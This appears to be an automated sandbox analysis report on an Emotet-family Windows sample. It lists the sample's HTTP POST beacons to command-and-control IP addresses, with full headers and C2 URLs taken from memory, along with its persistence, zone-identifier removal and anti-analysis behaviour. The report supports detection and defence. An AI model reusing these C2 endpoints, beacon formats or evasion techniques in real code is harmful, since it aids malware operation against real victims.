Source: global traffic	HTTP traffic detected: POST /w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 5.196.35.138/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------TO1T7raTR7e4z8n5IHost: 5.196.35.138:7080Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /yhwXMM7xdxH/yuXOhXg/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 74.58.215.226/yhwXMM7xdxH/yuXOhXg/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------l83eJPEldOxklGMHost: 74.58.215.226Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 186.70.127.199/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------wFchgTxoaJDVhqcHost: 186.70.127.199:8090Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 1.226.84.243/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------w2uEKzXy195rM91Host: 1.226.84.243:8080Content-Length: 4644Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /RzqG/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 12.162.84.2/RzqG/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------bavvEoDqHost: 12.162.84.2:8080Content-Length: 4644Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 177.23.7.151
Source: unknown	TCP traffic detected without corresponding DNS query: 177.23.7.151
Source: unknown	TCP traffic detected without corresponding DNS query: 177.23.7.151
Source: unknown	TCP traffic detected without corresponding DNS query: 177.23.7.151
Source: unknown	TCP traffic detected without corresponding DNS query: 177.23.7.151
Source: unknown	TCP traffic detected without corresponding DNS query: 177.23.7.151
Source: unknown	TCP traffic detected without corresponding DNS query: 177.23.7.151
Source: unknown	TCP traffic detected without corresponding DNS query: 95.85.33.23
Source: unknown	TCP traffic detected without corresponding DNS query: 95.85.33.23
Source: unknown	TCP traffic detected without corresponding DNS query: 95.85.33.23
Source: unknown	TCP traffic detected without corresponding DNS query: 95.85.33.23
Source: unknown	TCP traffic detected without corresponding DNS query: 95.85.33.23
Source: unknown	TCP traffic detected without corresponding DNS query: 95.85.33.23
Source: unknown	TCP traffic detected without corresponding DNS query: 192.232.229.54
Source: unknown	TCP traffic detected without corresponding DNS query: 192.232.229.54
Source: unknown	TCP traffic detected without corresponding DNS query: 192.232.229.54
Source: unknown	TCP traffic detected without corresponding DNS query: 192.232.229.54
Source: unknown	TCP traffic detected without corresponding DNS query: 192.232.229.54
Source: unknown	TCP traffic detected without corresponding DNS query: 192.232.229.54
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.58.37
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.58.37
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.58.37
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.58.37
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.58.37
Source: unknown	TCP traffic detected without corresponding DNS query: 46.101.58.37
Source: unknown	TCP traffic detected without corresponding DNS query: 70.32.115.157
Source: unknown	TCP traffic detected without corresponding DNS query: 70.32.115.157
Source: unknown	TCP traffic detected without corresponding DNS query: 70.32.115.157
Source: unknown	TCP traffic detected without corresponding DNS query: 70.32.115.157
Source: unknown	TCP traffic detected without corresponding DNS query: 70.32.115.157
Source: unknown	TCP traffic detected without corresponding DNS query: 70.32.115.157
Source: unknown	TCP traffic detected without corresponding DNS query: 111.67.12.221
Source: unknown	TCP traffic detected without corresponding DNS query: 111.67.12.221
Source: unknown	TCP traffic detected without corresponding DNS query: 111.67.12.221
Source: unknown	TCP traffic detected without corresponding DNS query: 111.67.12.221
Source: unknown	TCP traffic detected without corresponding DNS query: 111.67.12.221
Source: unknown	TCP traffic detected without corresponding DNS query: 111.67.12.221
Source: unknown	TCP traffic detected without corresponding DNS query: 98.13.75.196
Source: unknown	TCP traffic detected without corresponding DNS query: 98.13.75.196
Source: unknown	TCP traffic detected without corresponding DNS query: 98.13.75.196
Source: unknown	TCP traffic detected without corresponding DNS query: 98.13.75.196
Source: unknown	TCP traffic detected without corresponding DNS query: 98.13.75.196
Source: unknown	TCP traffic detected without corresponding DNS query: 98.13.75.196
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 5.196.35.138
Source: unknown	TCP traffic detected without corresponding DNS query: 74.58.215.226

Source: unknown

HTTP traffic detected: POST /3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------c1rFprRPYfa1Host: 177.23.7.151Content-Length: 4676Cache-Control: no-cache

Source: wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/070VvHPjARxs33T/WdATQgVfQYq/
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/GJ
Source: wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/V
Source: wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://1.226.84.243:8080/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/w
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.67.12.221:8080/6o1iAIEQeDHOWcsR/
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://111.67.12.221:8080/6o1iAIEQeDHOWcsR/$
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003420000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://12.162.84.2:8080/RzqG/
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://12.162.84.2:8080/RzqG/2Z
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://12.162.84.2:8080/RzqG/7
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://12.162.84.2:8080/RzqG/hU
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://12.162.84.2:8080/RzqG/wshqos.dll.mui
Source: wpbcreds.exe, 00000001.00000002.3288758119.0000000002EC6000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/)
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://186.70.127.199:8090/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://186.70.127.199:8090/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/A
Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.232.229.54:7080/xbe2duP8y5opIK2l/
Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.232.229.54:7080/xbe2duP8y5opIK2l/:n
Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.232.229.54:7080/xbe2duP8y5opIK2l/Z
Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.101.58.37:8080/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/
Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.101.58.37:8080/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/s
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288445689.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://5.196.35.138:7080/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRG
Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/
Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/2
Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://70.32.115.157:8080/K3KZ1n42NvAQNZg4/ngsLMEM8
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//M
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg//Y
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/5
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://74.58.215.226/yhwXMM7xdxH/yuXOhXg/t
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003420000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.85.33.23:8080/0POplCNbRBZ4or4A/
Source: wpbcreds.exe, 00000001.00000003.2601337027.0000000003449000.00000004.00000020.00020000.00000000.sdmp, wpbcreds.exe, 00000001.00000003.2488048416.000000000344A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.85.33.23:8080/0POplCNbRBZ4or4A/32
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://95.85.33.23:8080/0POplCNbRBZ4or4A/5
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/
Source: wpbcreds.exe, 00000001.00000002.3288892180.0000000003441000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/Z

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 75A0VTo3z9.exe, type: SAMPLE
Source: Yara match	File source: 1.2.wpbcreds.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.wpbcreds.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.75A0VTo3z9.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.75A0VTo3z9.exe.b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.2040983750.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3288300959.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2039200708.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

File created: C:\Windows\SysWOW64\fwcfg\

Jump to behavior

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

File deleted: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe:Zone.Identifier

Jump to behavior

Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B8210	0_2_000B8210
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B7E50	0_2_000B7E50
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B3D10	0_2_000B3D10
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B3B10	0_2_000B3B10
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B7620	0_2_000B7620
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B3D37	0_2_000B3D37
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B6340	0_2_000B6340
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B39B0	0_2_000B39B0
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B1BE0	0_2_000B1BE0

Source: 75A0VTo3z9.exe

Static PE information: No import functions for PE file found

Source: 75A0VTo3z9.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/0@0/84

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

Code function: CloseServiceHandle,CreateServiceW,_snwprintf,OpenSCManagerW,CloseServiceHandle,

0_2_000B87E0

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

Code function: 0_2_000B4E60 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,OpenServiceW,GetProcessHeap,HeapFree,

0_2_000B4E60

Source: 75A0VTo3z9.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 75A0VTo3z9.exe

ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\75A0VTo3z9.exe "C:\Users\user\Desktop\75A0VTo3z9.exe"
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Process created: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe "C:\Windows\SysWOW64\fwcfg\wpbcreds.exe"
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Process created: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe "C:\Windows\SysWOW64\fwcfg\wpbcreds.exe"	Jump to behavior

Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: 75A0VTo3z9.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, NO_SEH, TERMINAL_SERVER_AWARE

Source: 75A0VTo3z9.exe

Static PE information: real checksum: 0x2c41d should be: 0x246dc

Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5B00 push ecx; mov dword ptr [esp], 0000A2E6h	0_2_000B5B01
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5B30 push ecx; mov dword ptr [esp], 0000FA5Dh	0_2_000B5B31
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5C40 push ecx; mov dword ptr [esp], 0000BED0h	0_2_000B5C41
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5D60 push ecx; mov dword ptr [esp], 000022A3h	0_2_000B5D61
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5B70 push ecx; mov dword ptr [esp], 0000C5A7h	0_2_000B5B71
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5C70 push ecx; mov dword ptr [esp], 0000ADB2h	0_2_000B5C71
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5D80 push ecx; mov dword ptr [esp], 00000DA6h	0_2_000B5D81
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5DC0 push ecx; mov dword ptr [esp], 00004963h	0_2_000B5DC1
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5BC0 push ecx; mov dword ptr [esp], 000063CCh	0_2_000B5BC1
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5CD0 push ecx; mov dword ptr [esp], 0000374Ah	0_2_000B5CD1
Source: C:\Users\user\Desktop\75A0VTo3z9.exe	Code function: 0_2_000B5BF0 push ecx; mov dword ptr [esp], 0000B897h	0_2_000B5BF1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

Executable created and started: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Jump to behavior

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

PE file moved: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

File opened: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe:Zone.Identifier read attributes | delete

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 7080
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 7080
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 8090

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_0-5712

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,OpenServiceW,GetProcessHeap,HeapFree,

0_2_000B4E60

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\75A0VTo3z9.exe

Code function: 0_2_000B36A0 FindNextFileW,FindNextFileW,FindFirstFileW,FindFirstFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,

0_2_000B36A0

